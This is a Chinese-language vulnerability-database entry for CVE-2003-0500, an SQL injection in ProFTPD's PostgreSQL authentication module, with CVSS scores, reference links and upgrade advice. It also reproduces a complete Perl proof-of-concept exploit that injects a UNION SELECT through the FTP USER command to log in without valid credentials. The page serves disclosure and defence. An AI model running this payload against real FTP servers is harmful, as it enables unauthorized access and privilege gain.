CVE-2003-0500
CVSS10.0
发布时间 :2003-08-07 00:00:00
修订时间 :2008-09-05 16:34:28
NMCOE    

[原文]SQL injection vulnerability in the PostgreSQL authentication module (mod_sql_postgres) for ProFTPD before 1.2.9rc1 allows remote attackers to execute arbitrary SQL and gain privileges by bypassing authentication or stealing passwords via the USER name.


[CNNVD]ProFTPD PostgreSQL认证模块SQL注入漏洞(CNNVD-200308-006)

        ProFTPD 1.2.9rc1之前版本的PostgreSQL认证模块存在SQL注入漏洞。远程攻击者借助USER名绕过认证或者盗取密码来执行任意SQL且提升特权。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0500
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0500
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-006
(官方数据源) CNNVD

- 其它链接及资源

http://www.debian.org/security/2003/dsa-338
(VENDOR_ADVISORY)  DEBIAN  DSA-338
http://lists.grok.org.uk/pipermail/full-disclosure/2003-June/005826.html
(UNKNOWN)  FULLDISC  20030618 SQL Inject in ProFTPD login against Postgresql using mod_sql

- 漏洞信息

ProFTPD PostgreSQL认证模块SQL注入漏洞
危急 SQL注入
2003-08-07 00:00:00 2005-10-20 00:00:00
远程  
        ProFTPD 1.2.9rc1之前版本的PostgreSQL认证模块存在SQL注入漏洞。远程攻击者借助USER名绕过认证或者盗取密码来执行任意SQL且提升特权。

- 公告与补丁

        

- 漏洞信息 (43)

ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit (EDBID:43)
linux remote
2003-06-19 Verified
21 Spaine
N/A [点击下载]
#!/usr/bin/perl
# ProFTPD 1.2.9 rc1 mod_sql SQL Injection remote Exploit
# Spaine - 2003

use IO::Socket;
if(@ARGC<2){
    print "\nProof Of Concept Sql Inject on ProFTPD\n";
    print "Usage: perl poc-sqlftp <target> [1=Alternate query]\n\n";
    exit(0);
};

$server = $ARGV[0];
$query = $ARGV[1];
$remote = 
IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1) 
                          or die "Can't connect. \n";
if(defined($line=<$remote>)){
    print STDOUT $line;
}

# Proof of concept query, it may change on the number of rows
# By default, it can query User, Pass, Uid, Gid, Shell or
# User, Pass, Uid, Gid, Shell, Path, change the union query...

if($query eq "1"){
    print $remote "USER ')UNION 
SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n";
}else{
    print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash' 
WHERE(''='\n";
};
if(defined($line=<$remote>)){
    print STDOUT $line;
}
print $remote "PASS p\n";
if(defined($line=<$remote>)){
    print STDOUT $line;
}
print "Sent query to $ARGV[0]\n";
if($line =~ /230/){  #logged in
    print "[------- Sql Inject Able \n";
}else{
    print "[------- Sql Inject Unable \n";
}
close $remote;

# milw0rm.com [2003-06-19]
		

- 漏洞信息

9507
PostgreSQL Authentication Module (mod_sql) for ProFTPD USER Name Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-06-18 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.2.9rc3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站